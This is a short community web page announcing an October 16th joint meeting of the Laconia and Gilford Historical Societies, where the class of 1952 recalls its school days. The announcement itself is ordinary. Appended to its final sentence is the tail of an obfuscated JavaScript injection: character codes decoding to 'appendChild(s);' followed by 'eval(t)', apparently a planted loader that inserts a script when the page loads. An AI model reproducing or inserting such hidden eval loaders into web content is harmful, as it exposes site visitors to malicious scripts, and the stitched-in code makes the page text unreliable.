What was Middle and High School like for Gilford and Laconia students for those graduating in 1952? Or should I say, for those graduating from Junior High and Senior High in 1952? Come to the joint meeting of the Laconia and Gilford Historical Societies om Monday, October 16th, at the Laconia Fire Station’s conference room at 7 p.m. Parking is available across the street at the Opechee Park.
The class of 1952 will be presenting this program describing what school was like 65 years ago; a living history presentation that will be both educational and humorous as told by former students from Gilford and Laconia who still live in the area. For the young, learn what school was like 65 years ago and compare it with your school days. For the children of those students, learn about your parents teenage school years, were they serious students’, did they have fun, or get into “mischief”? For those interested in the history of education, come and compare their memories with your memories of your high school days. The class of 1952 holds annual reunions where they delight in sharing memories of their school days and they will be sharing their memories with the audience.
The program is free and all are invited. Come, ask questions, and share the refreshments. ,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,125);eval(/*674867468*/t);